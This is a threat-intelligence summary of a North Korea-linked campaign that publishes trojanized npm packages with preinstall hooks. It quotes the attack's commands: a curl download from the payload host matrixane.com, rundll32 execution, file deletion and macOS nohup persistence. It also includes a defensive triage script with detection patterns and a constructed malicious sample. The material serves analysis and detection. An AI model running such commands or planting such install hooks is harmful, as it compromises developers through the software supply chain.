Nation-State Threat Actors Renew Publications to npm

Phylum reports a renewed North Korea-linked operation that publishes trojanized npm packages which execute code during installation. The latest variant widens targeting beyond Windows to macOS and Linux, using obfuscated scripts and a download-and-execute payload while attempting to cover its tracks. Hashtags: #NorthKoreanStateActors #matrixane #node_config #npm #deferenceJS

Keypoints

  • North Korea-linked actors renewed activity in Open Source ecosystems by publishing trojanized npm packages with a preinstall hook.
  • The campaign reuses obfuscated JavaScript (deference.js) to execute payloads on installation.
  • Payload delivery involves downloading malware from a remote server (matrixane.com) via curl and executing it (e.g., rundll32 on Windows).
  • Attacks attempt to cover tracks by renaming legitimate files (pk.json to package.json) and deleting malicious script files (deference.js).
  • OS targeting expands beyond Windows to macOS and Linux; on macOS the payload is copied into a ~/Library/Application Support/UpdateProvider folder and launched in the background with nohup.
  • The campaign demonstrates ongoing North Korean state-sponsored activity in open-source repositories with repeated technique reuse.

MITRE Techniques

  • [T1195] Software Supply Chain – The attackers published trojanized npm packages with a preinstall hook to gain execution upon installation. “The npm user nebourhood open-source published two packages react-dom-production-script and hardhat-daemon with a preinstall hook in the package.json immediately executing a file in the package.”
  • [T1027] Obfuscated/Compressed Files and Information – They used an obfuscated JavaScript file called deference.js; “they resorted to simply executing a single obfuscated JavaScript file called deference.js.”
  • [T1105] Ingress Tool Transfer – The malware downloads a payload from a remote server: “curl --insecure -o data.tmp -L "https://matrixane.com/download/download.asp?id=8931"”
  • [T1218.011] Rundll32 – Windows proxy execution – The Windows payload uses Rundll32 to execute code: “rundll32 data.tmp,GenerateKey 7846”
  • [T1036] Masquerading – The attackers attempted to cover tracks by replacing a legitimate file with a similarly named one: “the replacement of the malicious package.json with pk.json to cover their tracks”
  • [T1070.004] File Deletion – The malware deletes evidence after installation: “exec('del deference.js')”
  • [T1082] System Information Discovery – The script detects OS type to decide deployment: “const type = os.type();” and “if ('Windows_NT' === type) {”
  • [T1059.004] Unix Shell – Cross-OS execution on macOS/Linux using shell commands: “mkdir ~/Library/Application Support/UpdateProvider”, “cp ./test-config.ts ~/Library/Application Support/UpdateProvider/updateMacOs”, “nohup … updateMacOs &> /dev/null 2>&1 &”, “rm deference.js”
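As an added example that is not part of the Phylum report or this summary, the following JavaScript triages a package's package.json for the install-hook pattern described above and scans the hooked script for the quoted behaviours; the pattern names, regexes, and the sample package are constructed for illustration, not real package data.

```javascript
// Added example (not from Phylum's report): defender-side triage of an npm
// package: flag install-time hooks and scan the hooked script for the traits
// the report describes. Pattern names and regexes are ours.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
const SUSPICIOUS_PATTERNS = {
  remote_download: /\bcurl\b[^\n]*(--insecure|-k\b|-o\s+\S+)/,
  rundll32_proxy_exec: /\brundll32\b/i,
  background_exec: /\bnohup\b[^\n]*&\s*$/m,
  os_detection: /os\.type\(\)/,
  self_delete: /\b(del|rm)\s+\S*\.js\b/,
  mac_update_provider: /UpdateProvider/,
};

// pkgJsonText: package.json contents; files: map of packaged path -> text.
// An obfuscated script (as deference.js was) will match few or no patterns,
// so a hook that executes a packaged file deserves a look even with no traits.
function triagePackage(pkgJsonText, files) {
  const scripts = JSON.parse(pkgJsonText).scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (!(hook in scripts)) continue;
    const command = scripts[hook];
    const bodies = [command];
    const run = command.match(/\bnode\s+(\S+\.js)\b/); // hook runs a shipped file?
    if (run && files[run[1]]) bodies.push(files[run[1]]);
    const traits = Object.entries(SUSPICIOUS_PATTERNS)
      .filter(([, re]) => bodies.some((b) => re.test(b)))
      .map(([name]) => name);
    findings.push({ hook, command, traits });
  }
  return findings;
}

// Constructed sample modelled on the quoted snippets; not a real package.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "constructed-sample-pkg",
  scripts: { preinstall: "node deference.js" },
});
const SAMPLE_FILES = {
  "deference.js": [
    "const os = require('os');",
    "const type = os.type();",
    "if ('Windows_NT' === type) {",
    "  exec('curl --insecure -o data.tmp -L \"https://example.invalid/p\"');",
    "  exec('rundll32 data.tmp,GenerateKey 7846');",
    "  exec('del deference.js');",
    "}",
  ].join("\n"),
};
console.log(JSON.stringify(triagePackage(SAMPLE_PACKAGE_JSON, SAMPLE_FILES)));
```

Run against an unpacked tarball, the same check can be pointed at the real package.json and the files it ships; a non-empty finding for any lifecycle hook is the signal to inspect the package before installing.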

Indicators of Compromise

  • [Domain] matrixane.com – Domain used to host the payload delivery and malware components.
  • [URL] https://matrixane.com/download/download.asp?id=8931 – Direct download URL for the malicious payload.
  • [File name] deference.js – Obfuscated loader script executed during installation.
  • [File name] data.tmp – Temporary file used to store downloaded payload before execution.
  • [File name] data.bat – Windows payload drop file created during execution on Windows.
  • [File name] updateMacOs – macOS payload allegedly copied and executed in macOS branch.
  • [File name] pk.json, package.json – File renaming to disguise malicious components.

Read more: https://blog.phylum.io/north-korean-state-actors/